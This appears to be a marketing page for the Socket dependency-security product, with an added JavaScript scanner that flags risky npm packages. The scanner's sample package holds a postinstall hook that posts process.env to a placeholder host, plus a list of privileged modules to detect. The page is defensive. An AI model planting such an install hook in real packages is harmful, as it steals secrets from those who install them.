Open source code makes up 90% of most codebases. It is critical to manage it effectively to reduce your organization's security risk.
It's 2022 and it's no longer sufficient to scan for known vulnerabilities (CVEs) and stop there. And yet, that's what the leading "supply chain security" products do, leaving you vulnerable.
It can take weeks or months for a CVE to be discovered, reported, and detected by tools. But in today's culture of fast development, a malicious dependency can be updated, merged, and running in production in days or sometimes even hours.
Defenders need a new approach to address emerging threats from malicious dependencies:
Maintainer intentionally added malware – Rogue maintainer sabotaged his own open source package with 100M downloads/month, affecting companies such as Amazon AWS
Package hijacked and poisoned w/ cryptominers and password-stealing malware – Deliberate malware introduced into multiple packages with 30M downloads/month each
Package hijacked to add backdoor targeting a specific organization – Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build
NPM package manager allowed anyone to publish new versions of any package – Attackers could publish new versions of any NPM package without authorization for multiple years
Using third-party dependencies without proper vetting leaves you open to hacking, breaches, and assorted security misfortune.
Security teams depend on Socket to prevent malicious open source dependencies from infiltrating their apps.
Socket dramatically improves your open source security posture by detecting and blocking the attacks you don't expect – malware, hidden code, typo-squatting, and more – which aren't caught by CVE vulnerability scanners.
Block typosquats – Block malicious packages that differ in name by only a few characters, and recommend the correct package
Block malware – Block emerging malware threats
Detect hidden code – Detect obfuscated, minified, or hidden code
Detect privileged API usage – Detect usage of risky APIs – filesystem, network, child_process, environment variables
Detect suspicious updates – Detect updates that significantly change package behavior
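As an added illustration of the signals listed above (example code, not Socket's own scanner), here is a small JavaScript script that checks a constructed npm package for install-time lifecycle scripts, imports of privileged modules, reads of process.env, and a few hidden-code indicators. The module list, thresholds, and the sample package are this example's assumptions.

```javascript
// Added example, not Socket's code. Module list and thresholds are assumptions for illustration.
const RISKY_MODULES = {
  child_process: 'process execution', fs: 'filesystem access',
  net: 'network access', http: 'network access', https: 'network access', dns: 'network access',
};
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Lifecycle scripts run on `npm install`, before any of the package's code is ever imported.
function scanManifest(pkg) {
  const scripts = pkg.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => Object.prototype.hasOwnProperty.call(scripts, h))
    .map((h) => ({ kind: 'install-script', detail: `${h}: ${scripts[h]}` }));
}

// Privileged API usage plus a few hidden-code indicators in one source file.
function scanSource(name, src) {
  const findings = [];
  const add = (kind, detail) => findings.push({ kind, detail: `${name}: ${detail}` });
  // Matches CommonJS require() and ESM `from '...'` specifiers, with or without the node: prefix.
  for (const m of src.matchAll(/(?:require\(\s*|from\s*)['"]([^'"]+)['"]/g)) {
    const mod = m[1].replace(/^node:/, '');
    if (Object.prototype.hasOwnProperty.call(RISKY_MODULES, mod)) {
      add('privileged-api', `${mod} (${RISKY_MODULES[mod]})`);
    }
  }
  if (/\bprocess\.env\b/.test(src)) add('privileged-api', 'environment variables');
  if (/\beval\s*\(|new\s+Function\s*\(/.test(src)) add('hidden-code', 'dynamic code execution');
  const escapes = (src.match(/\\(?:x[0-9a-f]{2}|u[0-9a-f]{4})/gi) || []).length;
  if (escapes > 20) add('hidden-code', `${escapes} hex/unicode escape sequences`);
  if (src.split('\n').some((line) => line.length > 1000)) add('hidden-code', 'minified or very long line');
  return findings;
}

function scanPackage(pkg, files) {
  return [...scanManifest(pkg), ...Object.entries(files).flatMap(([n, s]) => scanSource(n, s))];
}

// Constructed sample: a benign-looking utility whose postinstall hook posts process.env to a remote host.
const SAMPLE_PKG = { name: 'example-utils', version: '1.0.1', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_FILES = {
  'index.js': 'module.exports = (a, b) => a + b;\n',
  'setup.js': "const h = require('https');\n" +
    "h.request({ host: 'collector.example.invalid', method: 'POST' }).end(JSON.stringify(process.env));\n",
};

for (const f of scanPackage(SAMPLE_PKG, SAMPLE_FILES)) console.log(`[${f.kind}] ${f.detail}`);
```

Run against a real package by loading its package.json and the contents of its .js files into the same two arguments; the output is a list of findings to review, not a verdict.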
Socket improves security outcomes and reduces work for security teams by surfacing actionable security information directly inline in GitHub so developers are empowered to make better decisions.
Five minute deployment – The easiest security product you'll ever deploy in your organization. Just install a GitHub app and you're done.
Provide security feedback directly on PRs – Empower developers to solve security issues before they're deployed into production.
Automated security – Spend security team resources auditing the highest-impact dependencies, instead of all or nothing.